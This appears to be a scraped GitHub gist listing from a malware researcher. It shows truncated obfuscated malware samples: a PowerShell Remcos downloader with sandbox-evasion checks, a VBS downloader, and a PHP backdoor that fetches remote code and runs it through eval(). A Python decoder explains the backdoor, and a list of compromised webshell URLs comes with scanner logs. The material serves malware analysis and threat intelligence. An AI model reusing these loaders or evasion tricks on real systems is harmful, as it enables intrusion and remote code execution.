Josh Stroschein jstrosch

View GitHub Profile
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
jstrosch / gist:e3ffda2d30ed6597b886bf88946f3f76
Created August 5, 2022 13:36
Obfuscated PowerShell that downloads Remcos
Discovered through an open directory at: hxxps://instment[.]ga/wipper/
Original hash of attack.txt file (the code here): e7ecdedad56effcf92ba01081441e033e2564e4eb24720de55e6d84858958291
## BEGIN Powershell ##
$t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,011
jstrosch / gist:5437b9387580b255fefa7e903c908189
Created August 2, 2022 03:29
Obfuscated VBS Downloader Script
Discovered through an open directory at: hxxp://files.ddrive[.]online/
Original hash of VBS script (MD5): 8a9598f45a06e0c372b19cfacb4bb2a6
## BEGIN VBS ###
On Error Resume Next
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
jstrosch / gist:6746b6a59a1a01acce0c96b4863d805a
Created July 28, 2022 00:39
Obfuscated PHP backdoor challenge :)
Initially reported distributing Emotet on URLHaus: https://urlhaus.abuse.ch/browse.php?search=+http%3A%2F%2Fsolr.yakari.id
Discovered through an open directory at: hxxp://solr.yakari[.]id/wp-content/mu-plugins-old/index.php.suspected
Original hash of PHP file: dacc0f895428822979bda234f4f15bfe
## BEGIN PHP ##
$uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{1
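The visible part of the PHP above hides its payload in two layers: five base64 chunks reassembled into `$vpna643`, and a 73-character alphabet in `$uoeq967` indexed with the old `$str{n}` offset syntax to spell function names one character at a time through the `cdim173()` concatenation helper. Below is an added Python decoder written for this page (it is not the gist's code and not from any tool); it embeds the quoted PHP fragment as constructed input and peels both layers. The five chunks decode to a curl fetch of `hxxp://banksstop[.]tech/` + `$_GET['f']` whose response body goes straight into `eval()`; the three alphabet lookups that survive the truncation spell `call`, `_use` and `r_f`, the start of what is evidently a `call_user_func` wrapper, though the rest of the file is cut off in the listing.

```python
import base64
import re

# Constructed input: the visible start of the PHP file quoted above, split at
# statement boundaries for readability. The last statement is cut off exactly
# where the gist listing is.
PHP = """$uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";
$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';
$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';
$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';
$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';
$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';
$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;
function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}
$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});
$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');
$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});
$hume205 = cdim173($uoeq967{1"""


def string_literals(php: str) -> dict:
    """Map every $name='...' / $name="..." assignment to its literal value."""
    lits = {}
    for name, dq, sq in re.findall(r"\$(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)')\s*;", php):
        lits[name] = dq or sq
    return lits


def concatenations(php: str, lits: dict) -> dict:
    """Resolve $x=$a.$b.$c; statements against the literals found above."""
    out = {}
    for name, expr in re.findall(r"\$(\w+)\s*=\s*((?:\$\w+\s*\.\s*)+\$\w+)\s*;", php):
        out[name] = "".join(lits[p.strip().lstrip("$")] for p in expr.split("."))
    return out


def decode_payload(php: str) -> str:
    """Layer one: reassemble the base64 chunks and decode them."""
    joined = concatenations(php, string_literals(php))["vpna643"]
    return base64.b64decode(joined).decode()


def alphabet_lookups(php: str) -> dict:
    """Layer two: cdim173() only concatenates its arguments, so each
    $x = cdim173($alpha{i}, $alpha{j}.$alpha{k}, ...) is just the alphabet
    characters at those offsets, in order. The incomplete call at the end of
    the listing has no closing parenthesis and is skipped."""
    alphabet = string_literals(php)["uoeq967"]
    out = {}
    for name, args in re.findall(r"\$(\w+)\s*=\s*cdim173\(([^)]*)\)\s*;", php):
        out[name] = "".join(alphabet[int(i)] for i in re.findall(r"\{(\d+)\}", args))
    return out


if __name__ == "__main__":
    print(decode_payload(PHP))
    for var, value in alphabet_lookups(PHP).items():
        print(f"${var} = {value!r}")
```

Two triage points fall out of the decode. The loader uses the curl extension plus `eval()` rather than `include()`, so neither `allow_url_fopen` nor `allow_url_include` restricts it, and the real fetch location never appears in cleartext in the file. And the `$str{n}` curly-brace string offsets it relies on were deprecated in PHP 7.4 and removed in 8.0, so the file is a parse error on PHP 8: a reliable hint about which runtime to detonate it under.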

Keybase proof

I hereby claim:

  • I am jstrosch on github.
  • I am jstrosch (https://keybase.io/jstrosch) on keybase.
  • I have a public key ASDkmIOHHVo_eM7no0mxaZUOKWRxavuanSwN1FhI2GLbogo

To claim this, I am signing this object:

#!/usr/bin/env bash
PCAPFILE=$1
LOG_LOCATION='/tmp/suricata/'
if [ -z "$PCAPFILE" ] || [ ! -f "$PCAPFILE" ]; then
echo "File ${PCAPFILE} doesn't seem to be there - please supply a pcap file."
exit 1;
fi
#!/usr/bin/env bash
SESSION_USER=$(logname)
PCAPFILE=$1
if (( $EUID != 0 )); then
echo -e "Please run this script as root or with \"sudo\".\n"
exit 1
fi
#! /bin/sh
set -e
echo "Removing existing dummy interface."
nmcli con delete dummy-dummy0 || true
echo "Adding dummy0."
nmcli con add ifname dummy0 type dummy ipv4.method link-local
jstrosch / gist:c07ad8f59e50b21a7304aa34044a5b92
Created October 22, 2021 16:22
password-protected webshells and PE payloads from Dridex-tagged URLs via URLHaus
<===== WEBSHELLS =====>
[*] Shell SHA256: 6abf737186523a962f94e0e6b6bed5f5ab9238d3fddfc173d8ef83b67400d4ca
[HOST] https://regiontreasure.com/js/vendor/option.php
[HOST] https://reportingdashboard.mobilisedev.co.uk/includes/app.core.php
[HOST] https://eflcc.in/images/prettyPhoto/dark_rounded/authorize.php
[HOST] https://chains.lookarma.com.br/wp-includes/sodium_compat/src/Core/Base64/class.core.php
[HOST] https://reviewgrenade.com/wp-content/themes/blossom-fashion/inc/css/lib.php
[HOST] https://www.turksagroup.com/wp-content/plugins/redux-framework/redux-core/appsero/app.class.php
[HOST] https://stockmanager.upd.work/themes/default/views/auth/email/lib.api.php
[HOST] https://demo.usa-mycard.com/sql/class.cache.php
Originally reported: https://twitter.com/James_inthe_box/status/1425187264435429378
2021-08-10 14:47:22,752 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://regiontreasure.com/js/vendor/option.php )
2021-08-10 14:47:24,001 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://ishaninfocom.com/images/Newimage/core.lib.php )
2021-08-10 14:48:16,637 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://glasstryon.com/webcamjs/flash/com/adobe/images/viewer.php )
2021-08-10 14:48:32,720 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://toucan.webiknows.net/vendor/swiper/css/type.php )
2021-08-10 14:49:03,635 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://essennvalves.in/essennvalves.in/plugins/material-design-iconic-font/css/app.class.php )
2021-08-10 14:49:47,965 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://elearning.thegurukulonline.com/class_8/Computer/app.class.php )
2021-08-10 14:50:36,629 — SubCrawl — INFO — [YARA] Ma